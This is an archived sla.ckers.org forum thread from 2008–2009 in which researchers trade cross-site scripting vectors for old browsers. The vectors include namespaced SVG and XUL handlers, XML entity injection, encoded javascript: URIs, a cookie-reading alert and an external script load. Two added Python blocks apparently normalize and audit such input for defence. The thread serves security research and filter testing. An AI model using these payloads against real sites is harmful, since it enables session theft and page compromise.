sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: November 13, 2008 01:12PM

DOM Redressing in IE6-8b2

<form id="location" href="bar">  

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: November 13, 2008 03:11PM

@mario

Yep saw that post. Awesome stuff :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: November 17, 2008 04:54PM

Have you guys tried document.domain with this DOM redressing stuff?
I don't have access to Windows right now, but it sounds to me like something to test, and no one has commented on it yet.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: November 25, 2008 02:25PM

Yep - apparently it doesn't circumvent the SOP.

Anyway - I found this one fun:

<?xml version="1.0" encoding="UTF-8"?>
<html xmlns="http://www.w3.org/1999/xhtml" 
      xmlns:svg="http://www.w3.org/2000/svg">
<svg:g onload="alert(8)"/>
</html>

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: November 25, 2008 02:45PM

<html xmlns:ø="http://www.w3.org/1999/xhtml">
    <ø:script src="//0x.lv/" />
</html>

Opera, Safari, Chrome, FF2, FF3...

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: November 25, 2008 04:14PM

oooooo pretty damn awesome mario

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: December 01, 2008 10:43AM

http://www.thespanner.co.uk/2008/12/01/location-based-xss-attacks/

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: December 03, 2008 08:54AM

//IE only
document.body.runtimeStyle.cssText = '1:expression(alert(1))'

Re: New XSS vectors
Posted by: Robert Chapin
Date: December 03, 2008 09:55PM

Gareth Heyes Wrote:
-------------------------------------------------------
> x='aler\u200ft(1)'
> eval(x)

I need help with this and similar ones. They don't seem to do anything in my browsers.

<script>
x='aler\u200ft(1)'
eval(x)
</script>

Does nothing? Did I miss the point?

This one works for me: <object data=jav&#x61script:\u0061lert(2)>

I have a new vector for the cheat sheet and want to make sure I understand the thread before I say something ;)

Re: New XSS vectors
Posted by: Anonymous User
Date: December 04, 2008 03:03AM

New kid on the block! :)

The \uXXXX stuff usually works in Gecko browsers. Some of the vectors only work on Firefox 2. The one you mentioned above doesn't work for me either - neither on FF2.0.0.18 W32 nor on FF3.0.4 Linux - but probably on earlier versions.

So - what about the new submission for the cheat sheet? :)

Ah - and some more vector fast food (FF2/3, UTF-8)
µ=<µ ß='le' µ='a' ø='rt'></µ>,top[µ.@µ+µ.@ß+µ.@ø](µ)

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 04, 2008 04:07PM

@robert

I can't even remember that one :) I think it might have been a Firefox 2 vector. Could have been fixed now. I think it was a character that was ignored in JS so it was possible to pad chars.

Could be related to this:
http://www.mozilla.org/security/announce/2008/mfsa2008-43.html

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 04, 2008 04:51PM

This works in FF3
x='\u0020alert\u0009(1)';
eval(x);

Re: New XSS vectors
Posted by: Anonymous User
Date: December 07, 2008 10:12AM

Why Firefox, why...

<xul:image 
    onerror="alert(document.cookie)" 
    src="x" 
    xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
/>

more info

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 08, 2008 09:42AM

Simply because they like our thread and want to see more :D

Re: New XSS vectors
Posted by: Anonymous User
Date: December 08, 2008 09:52AM

Only logical explanation :) But seriously - what sense does it make to allow certain XUL elements with inline namespaces inside regular XHTML documents - in case the namespace URI points to the default XUL file??

Re: New XSS vectors
Posted by: Gareth Heyes
Date: December 08, 2008 10:17AM

Perhaps their idea is to replace XHTML with XUL. Personally I think XUL sucks because I didn't like it when I played with it.

Re: New XSS vectors/Unusual Javascript
Posted by: Robert Chapin
Date: December 09, 2008 10:46PM

mario & Gareth, thanks I'm glad it wasn't just me.

The breakthrough I thought I had for the cheat sheet didn't pan out. At least I didn't make an ass of myself by publishing an untested exploit.

As a small consolation prize, I do have a variation for you.

The cheat sheet says this doesn't work in FF:

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115....>

But if you combine this vector with the iframe vector it works perfectly in FF, IE, OP. Also note the unclosed tag.

<iframe SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>

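A defender-side note on the numeric-reference vectors in the post above (an added example, not code from the thread or from any poster): a filter that inspects the raw attribute value never sees the word javascript, because the browser resolves the character references (tolerating zero padding, hex and missing semicolons) and drops tabs and newlines before it reads the scheme. The normalizer below mirrors that decoding with Python's html.unescape and applies an allow-list check to the decoded form; the scheme allow-list is this example's own choice, and the sample values are constructed after the thread's vectors with example.com as a placeholder host.

```python
import html
import re

# Schemes a URL-bearing attribute (src, href, data, action) may carry;
# an allow-list chosen for this example, not a browser rule.
SAFE_SCHEMES = {"http", "https", "mailto"}

def normalize_url_attr(value: str) -> str:
    """Decode an attribute value the way a browser does before it reads the
    URL scheme: character references (decimal, zero-padded decimal, hex, with
    or without the trailing ';') are resolved, leading/trailing C0 controls
    and spaces are trimmed, and tab/CR/LF are removed anywhere in the URL."""
    decoded = html.unescape(value)          # &#106 / &#0000106 / &#x6a; -> 'j'
    trimmed = decoded.strip("".join(map(chr, range(0x21))))
    return re.sub(r"[\t\n\r]", "", trimmed)

def url_scheme(value: str) -> str:
    """Return the lower-cased scheme of the normalized URL, or '' if relative."""
    m = re.match(r"^([a-zA-Z][a-zA-Z0-9+.-]*):", normalize_url_attr(value))
    return m.group(1).lower() if m else ""

def is_safe_url(value: str) -> bool:
    """Allow relative URLs and allow-listed schemes; reject everything else.
    The decision is made on the normalized form, so encoding cannot hide the scheme."""
    scheme = url_scheme(value)
    return scheme == "" or scheme in SAFE_SCHEMES

# Constructed samples modelled on the vectors in the thread.
IFRAME_VECTOR = ("&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58"
                 "&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41")
# Zero-padded IMG variant from the cheat sheet, generated here rather than typed out.
IMG_VECTOR = "".join("&#%07d" % ord(c) for c in "javascript:alert(1)")
HEX_TAB_VECTOR = "jav&#x61;&#9;script:alert(2)"
BENIGN = ["https://example.com/?a=1&#38;b=2", "/relative/path", "mailto:x@example.com"]

if __name__ == "__main__":
    for v in (IFRAME_VECTOR, IMG_VECTOR, HEX_TAB_VECTOR, *BENIGN):
        print(f"safe={is_safe_url(v)!s:5} scheme={url_scheme(v)!r:13} raw={v[:40]}")
```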
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: December 12, 2008 07:33AM

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+1/+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ++alert(1)

Re: New XSS vectors/Unusual Javascript
Posted by: thornmaker
Date: December 12, 2008 07:02PM

linear and exponential growth

data:text/html,<script>location+=1</script>

data:text/html,<script>location+=location</script>

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: December 13, 2008 12:39AM

//FF only

x=function()'ale'
~(1)
y=function()'rt'
~(1)
a getter=x
b getter=y
document.defaultView[a+b]
(1)

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: December 16, 2008 05:14PM

Good old XXE - almost older than me (and I am damn old *g*)

<!DOCTYPE html PUBLIC "" "" [
  <!ENTITY copy "<script>alert(1)</script>">
  <!ENTITY auml "<script>alert(2)</script>">
]>
<html xmlns="http://www.w3.org/1999/xhtml">
    &copy;
    &auml;
</html>
(all W3C browsers - only XML docs)


And some more XML fun

<img:img 
    xmlns:img="http://www.w3.org/1999/xhtml" 
    src="" 
    onerror="alert(this)" 
/>
(FF2-3)

Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: December 16, 2008 10:12PM

Gareth, .mario, those past few posts have got some good stuff! Never knew you could define an entity...
Also, good (well, probably bad) to see some new XML vectors coming out of this thread.

-Dan

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: December 18, 2008 03:39AM

@DoctorDan: Yep - XML is like Pandora's box. I was talking to a friend of mine who works as a webdev and told him that I see a lot of potential for vulnerabilities in MathML, and he said he doesn't see why. Some days later... FF3.0.4 crash bug via MathML on FD. Another example: the recent IE5-8 exploit - XML data islands. The inline namespaces in the examples above circumvent most self-coded filters, and most browsers support features a high percentage of webdevs don't even know exist.

I was doing a talk some days ago about those issues (Here are the slides - German language but a lot of code, English version on request *g*) and most of the stuff I talked about wasn't known by any person in the whole room. Needless to say all guys present were excellent developers with combined experience of like 50-100 years.

There's a lot of weird stuff coming - and almost the same amount of stuff being already there. Funny 2009 it will be :)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: December 18, 2008 03:50AM

@mario

You can actually encode the entities like I posted before :P

http://www.businessinfo.co.uk/labs/xml_injection/inject.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html [
<!ENTITY inject "&#60;script&#62;alert(1)&#60;/script&#62;">
]>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Test</title>
</head>

<body>
&inject;
</body>
</html>

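An added example (not code from the thread or from any poster) covering both the prefixed-namespace vectors earlier in the thread (svg:g, ø:script, img:img, xul:image) and the entity-declaration vectors in the last few posts: the audit below resolves every element to its namespace URI and local name before deciding, so the prefix plays no part, and it reports any DOCTYPE or entity declaration, since a DTD is what lets &inject; carry markup. It uses the standard-library expat bindings; the sample documents are constructed after the thread's vectors with example.invalid as a placeholder host.

```python
import xml.parsers.expat as expat

XHTML_NS = "http://www.w3.org/1999/xhtml"
SVG_NS = "http://www.w3.org/2000/svg"
XUL_NS = "http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"

def audit_xml(doc: str) -> list:
    """Report script elements, event-handler attributes, XUL elements and
    DTD/entity declarations, deciding on the resolved namespace URI and
    local name so the prefix (svg:, xul:, img:, a single letter) is irrelevant."""
    findings = []
    parser = expat.ParserCreate(namespace_separator=" ")  # names arrive as "uri local"

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Any DTD can declare entities; a hardened pipeline rejects it outright.
        if has_internal_subset:
            findings.append(f"doctype '{name}' with internal subset")
        if sysid or pubid:
            findings.append(f"doctype '{name}' with external identifier")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        findings.append(f"entity declaration: {name}")

    def on_start(name, attrs):
        ns, _, local = name.rpartition(" ")  # ns is '' for unnamespaced elements
        if local == "script" and ns in (XHTML_NS, SVG_NS):
            findings.append(f"script element in namespace {ns}")
        if ns == XUL_NS:
            findings.append(f"XUL element <{local}>")
        for attr in attrs:
            alocal = attr.rpartition(" ")[2]
            if alocal.lower().startswith("on"):
                findings.append(f"event handler attribute {alocal} on <{local}>")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    parser.Parse(doc, True)  # internal entities are expanded and re-parsed here
    return findings

# Constructed samples modelled on the thread's vectors; the URL is a placeholder.
PREFIXED_SCRIPT = ('<html xmlns:ø="http://www.w3.org/1999/xhtml">'
                   '<ø:script src="//example.invalid/" /></html>')
SVG_ONLOAD = ('<html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg">'
              '<svg:g onload="alert(8)"/></html>')
ENTITY_INJECT = ('<!DOCTYPE html [<!ENTITY inject "&#60;script&#62;alert(1)&#60;/script&#62;">]>'
                 '<html xmlns="http://www.w3.org/1999/xhtml"><body>&inject;</body></html>')
CLEAN = '<html xmlns="http://www.w3.org/1999/xhtml"><body><p>hello</p></body></html>'
```

Running audit_xml over ENTITY_INJECT returns the doctype, entity and script findings (the character references in the entity value are resolved at declaration time, so the expanded entity is parsed as a real script element); over CLEAN it returns an empty list.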
Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: December 18, 2008 04:27AM

Nice! I wonder if it's possible to somehow overwrite entities like &lt; or &gt; using extravagant encodings or using SYSTEM entities - using plain text doesn't work so far.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: December 18, 2008 04:45AM

Haha, you had the same idea as me :) I found that custom entities didn't work in the browsers unless they were XML :( Maybe it's different now because we have inline namespaces.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: December 28, 2008 03:03PM

//FF only
window[[['alert',],]](1)

Re: New XSS vectors/Unusual Javascript
Posted by: thornmaker
Date: December 28, 2008 09:01PM

location.assign('\u000ahttp\u003a/\u000a/p42.us')

Re: New XSS vectors/Unusual Javascript
Posted by: Robert Chapin
Date: January 03, 2009 02:19AM

Fun with IE6

<img src=`&#14&#106&#97va&#9&#115&#99ript&#58ale&#114t&#47&#x2a&#102" alt="" />

<div id=&#42&#x2f&#13&#40&#47
XSS1
&#47&#46source&#41
<alert(/xss2/)
<!-- alert(/WTF XSS3/)`-->

I wanted to see how many cheats I could combine with irrelevant obfuscation. In the attempt, I executed multiple statements without semicolons.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: January 04, 2009 02:16AM

//FF only
o={"b"getter:Function('alert(1)')},o.b
